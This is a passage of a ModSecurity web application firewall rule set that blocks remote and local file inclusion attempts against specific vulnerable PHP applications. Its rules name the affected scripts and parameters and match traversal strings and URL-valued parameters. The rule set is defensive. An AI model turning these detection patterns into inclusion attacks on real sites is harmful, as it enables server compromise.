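    SecRule &TX:'/RFI.*ARGS:row_y5_site_configuration[[]templates_folder[]]/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS asaher pro view_blog_comments.php Remote File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2010773) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS asaher pro view_blog_archives.php Remote File Inclusion Attempt
SecRule REQUEST_LINE "@contains /view_blog_archives.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010773,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS asaher pro view_blog_archives.php Remote File Inclusion Attempt',tag:'web-application-attack',tag:'url,www.packetstormsecurity.org/0912-exploits/asaherpro-rfi.txt'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule &TX:'/RFI.*ARGS:row_y5_site_configuration[[]templates_folder[]]/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS asaher pro view_blog_archives.php Remote File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2010774) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS asaher pro add_comments.php row_y5_site_configuration Remote File Inclusion Attempt
SecRule REQUEST_LINE "@contains /add_comments.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010774,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS asaher pro add_comments.php row_y5_site_configuration Remote File Inclusion Attempt',tag:'web-application-attack',tag:'url,www.packetstormsecurity.org/0912-exploits/asaherpro-rfi.txt'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule &TX:'/RFI.*ARGS:row_y5_site_configuration[[]templates_folder[]]/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS asaher pro add_comments.php row_y5_site_configuration Remote File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2010775) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS asaher pro downloads.php row_y5_site_configuration Remote File Inclusion Attempt
SecRule REQUEST_LINE "@contains /downloads.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010775,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS asaher pro downloads.php row_y5_site_configuration Remote File Inclusion Attempt',tag:'web-application-attack',tag:'url,www.packetstormsecurity.org/0912-exploits/asaherpro-rfi.txt'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule &TX:'/RFI.*ARGS:row_y5_site_configuration[[]templates_folder[]]/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS asaher pro downloads.php row_y5_site_configuration Remote File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2010776) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS asaher pro emailsender.php row_y5_site_configuration Remote File Inclusion Attempt
SecRule REQUEST_LINE "@contains /emailsender.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010776,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS asaher pro emailsender.php row_y5_site_configuration Remote File Inclusion Attempt',tag:'web-application-attack',tag:'url,www.packetstormsecurity.org/0912-exploits/asaherpro-rfi.txt'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule &TX:'/RFI.*ARGS:row_y5_site_configuration[[]templates_folder[]]/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS asaher pro emailsender.php row_y5_site_configuration Remote File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2010777) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS asaher pro left_menu.php row_y5_site_configuration Remote File Inclusion Attempt
SecRule REQUEST_LINE "@contains /left_menu.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010777,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS asaher pro left_menu.php row_y5_site_configuration Remote File Inclusion Attempt',tag:'web-application-attack',tag:'url,www.packetstormsecurity.org/0912-exploits/asaherpro-rfi.txt'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule &TX:'/RFI.*ARGS:row_y5_site_configuration[[]templates_folder[]]/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS asaher pro left_menu.php row_y5_site_configuration Remote File Inclusion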
Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009790) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS beLive arch.php arch Parameter Local File Inclusion SecRule REQUEST_LINE "@contains /arch.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009790,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS beLive arch.php arch Parameter Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,34968'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:arch "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS beLive arch.php arch Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2008966) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS ccTiddly index.php cct_base parameter Remote File Inclusion SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2008966,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS ccTiddly index.php cct_base parameter Remote File Inclusion',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/7336'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:cct_base/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS ccTiddly index.php cct_base parameter Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2008967) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS ccTiddly proxy.php cct_base parameter Remote File Inclusion SecRule REQUEST_LINE "@contains /handle/proxy.php" 
"chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2008967,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS ccTiddly proxy.php cct_base parameter Remote File Inclusion',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/7336'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:cct_base/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS ccTiddly proxy.php cct_base parameter Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2008968) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS ccTiddly header.php cct_base parameter Remote File Inclusion SecRule REQUEST_LINE "@contains /includes/header.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2008968,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS ccTiddly header.php cct_base parameter Remote File Inclusion',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/7336'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:cct_base/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS ccTiddly header.php cct_base parameter Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2008969) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS ccTiddly include.php cct_base parameter Remote File Inclusion SecRule REQUEST_LINE "@contains /includes/include.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2008969,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS ccTiddly include.php cct_base parameter Remote File Inclusion',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/7336'" SecRule REQUEST_LINE "@contains GET " "chain" 
SecRule &TX:'/RFI.*ARGS:cct_base/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS ccTiddly include.php cct_base parameter Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2008970) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS ccTiddly workspace.php cct_base parameter Remote File Inclusion SecRule REQUEST_LINE "@contains /includes/workspace.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2008970,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS ccTiddly workspace.php cct_base parameter Remote File Inclusion',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/7336'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:cct_base/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS ccTiddly workspace.php cct_base parameter Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009367) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS cmsWorks lib.module.php mod_root Parameter Remote File Inclusion SecRule REQUEST_LINE "@contains /lib.module.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009367,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS cmsWorks lib.module.php mod_root Parameter Remote File Inclusion',tag:'web-application-attack',tag:'bugtraq,29914'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule QUERY_STRING|REQUEST_BODY "(?i:mod_root=\s*(https?|ftps?|php))" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS cmsWorks lib.module.php mod_root Parameter Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2010847) SpiderLabs 
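Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS com_if_nexus controller Parameter Remote File Inclusion Attempt
# Chain: request line names /index.php, contains "GET " and "option=com_if_nexus&",
# AND a TX marker whose name matches /RFI.*ARGS:controller/ exists.
SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010847,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS com_if_nexus controller Parameter Remote File Inclusion Attempt',tag:'web-application-attack',tag:'url,www.exploit-db.com/exploits/10754'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule REQUEST_LINE "@contains option=com_if_nexus&" "chain"
    SecRule &TX:'/RFI.*ARGS:controller/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS com_if_nexus controller Parameter Remote File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2009874) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS cpCommerce _functions.php GLOBALS Parameter Remote File Inclusion
# The TX selector is a regular expression, so a bare "[prefix]" is a character class
# (one character out of p,r,e,f,i,x) and cannot match the literal parameter name
# "GLOBALS[prefix]" in a marker named ...RFI-ARGS:GLOBALS[prefix]. The brackets are
# written as the single-character classes [[] and []] so they match literally without
# depending on backslash escapes inside the quoted selector.
# NOTE(review): the chain only matches request lines containing "GET "; confirm
# whether the same parameter arriving by another method should also be covered.
SecRule REQUEST_LINE "@contains /_functions.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009874,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS cpCommerce _functions.php GLOBALS Parameter Remote File Inclusion',tag:'web-application-attack',tag:'bugtraq,35103'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule &TX:'/RFI.*ARGS:GLOBALS[[]prefix[]]/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS cpCommerce _functions.php GLOBALS Parameter Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2009875) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS cpCommerce _functions.php GLOBALS Parameter Local File Inclusion
SecRule REQUEST_LINE "@contains /_functions.php"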
"chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009875,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS cpCommerce _functions.php GLOBALS Parameter Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,35103'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:GLOBALS[prefix] "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS cpCommerce _functions.php GLOBALS Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009435) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS e107 123 FlashChat Module 123flashchat.php e107path Parameter Remote File Inclusion SecRule REQUEST_LINE "@contains /123flashchat.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009435,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS e107 123 FlashChat Module 123flashchat.php e107path Parameter Remote File Inclusion',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:e107path/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS e107 123 FlashChat Module 123flashchat.php e107path Parameter Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009436) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS e107 123 FlashChat Module 123flashchat.php e107path Parameter Local File Inclusion SecRule REQUEST_LINE "@contains /123flashchat.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009436,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS e107 123 FlashChat Module 123flashchat.php e107path Parameter Local File Inclusion',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains 
GET " "chain" SecRule ARGS:e107path "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS e107 123 FlashChat Module 123flashchat.php e107path Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009932) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Possible eFront database.php Remote File Inclusion Attempt SecRule REQUEST_LINE "@contains /libraries/database.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009932,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Possible eFront database.php Remote File Inclusion Attempt',tag:'web-application-attack',tag:'url,www.owasp.org/index.php/PHP_File_Inclusion'" SecRule QUERY_STRING|REQUEST_BODY "(?i:\x2Ephp\x3F.{0,300}\x3D(http\x3A|ftp\x3A|https\x3A|ftps\x3A))" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Possible eFront database.php Remote File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009224) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS ea-gBook index_inc.php inc_ordner parameter local file inclusion SecRule REQUEST_LINE "@contains /index_inc.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009224,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS ea-gBook index_inc.php inc_ordner parameter local file inclusion',tag:'web-application-attack',tag:'bugtraq,33774'" SecRule ARGS:inc_ordner "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS ea-gBook index_inc.php inc_ordner parameter local file inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009225) SpiderLabs Research (SLR) Public Vulns: ET 
WEB_SPECIFIC_APPS ea-gBook index_inc.php inc_ordner parameter remote file inclusion SecRule REQUEST_LINE "@contains /index_inc.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009225,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS ea-gBook index_inc.php inc_ordner parameter remote file inclusion',tag:'web-application-attack',tag:'bugtraq,33774'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:inc_ordner/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS ea-gBook index_inc.php inc_ordner parameter remote file inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2008849) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS evision cms add3rdparty.php module parameter Local File Inclusion SecRule REQUEST_LINE "@contains /modules/3rdparty/adminpart/add3rdparty.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2008849,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS evision cms add3rdparty.php module parameter Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,32180'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:module/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS evision cms add3rdparty.php module parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2008850) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS evision cms addpolling.php module parameter Local File Inclusion SecRule REQUEST_LINE "@contains /modules/polling/adminpart/addpolling.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2008850,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS evision cms 
addpolling.php module parameter Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,32180'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:module/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS evision cms addpolling.php module parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2008851) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS evision cms addcontact.php module parameter Local File Inclusion SecRule REQUEST_LINE "@contains /modules/contact/adminpart/addcontact.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2008851,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS evision cms addcontact.php module parameter Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,32180'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:module/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS evision cms addcontact.php module parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2008852) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS evision cms addbrandnews.php module parameter Local File Inclusion SecRule REQUEST_LINE "@contains /modules/brandnews/adminpart/addbrandnews.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2008852,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS evision cms addbrandnews.php module parameter Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,32180'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:module/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS evision cms addbrandnews.php module parameter Local File 
Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2008853) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS evision cms addnewsletter.php module parameter Local File Inclusion SecRule REQUEST_LINE "@contains /modules/newsletter/adminpart/addnewsletter.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2008853,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS evision cms addnewsletter.php module parameter Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,32180'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:module/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS evision cms addnewsletter.php module parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2008854) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS evision cms addgame.php module parameter Local File Inclusion SecRule REQUEST_LINE "@contains /modules/game/adminpart/addgame.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2008854,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS evision cms addgame.php module parameter Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,32180'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:module/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS evision cms addgame.php module parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2008855) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS evision cms addtour.php module parameter Local File Inclusion SecRule REQUEST_LINE "@contains 
/modules/tour/adminpart/addtour.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2008855,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS evision cms addtour.php module parameter Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,32180'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:module/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS evision cms addtour.php module parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2008856) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS evision cms addarticles.php module parameter Local File Inclusion SecRule REQUEST_LINE "@contains /modules/articles/adminpart/addarticles.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2008856,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS evision cms addarticles.php module parameter Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,32180'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:module/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS evision cms addarticles.php module parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2008857) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS evision cms addproduct.php module parameter Local File Inclusion SecRule REQUEST_LINE "@contains /modules/product/adminpart/addproduct.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2008857,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS evision cms addproduct.php module parameter Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,32180'" SecRule 
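REQUEST_LINE "@contains GET " "chain"
SecRule &TX:'/RFI.*ARGS:module/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS evision cms addproduct.php module parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2008858) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS evision cms addplain.php module parameter Local File Inclusion
# Chain: script path in the request line, "GET " in the request line, and at
# least one TX variable whose name matches /RFI.*ARGS:module/.
SecRule REQUEST_LINE "@contains /modules/plain/adminpart/addplain.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2008858,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS evision cms addplain.php module parameter Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,32180'"
SecRule REQUEST_LINE "@contains GET " "chain"
SecRule &TX:'/RFI.*ARGS:module/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS evision cms addplain.php module parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2010661) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS epay a_affil.php _REQUEST Remote File Inclusion Attempt
# The text between the slashes in the TX selector is a regular expression.
# The brackets of the parameter name are escaped so that the literal name
# _REQUEST[read] is matched; unescaped, "[read]" is a character class and the
# bracketed name would not satisfy the pattern, leaving the rule silent.
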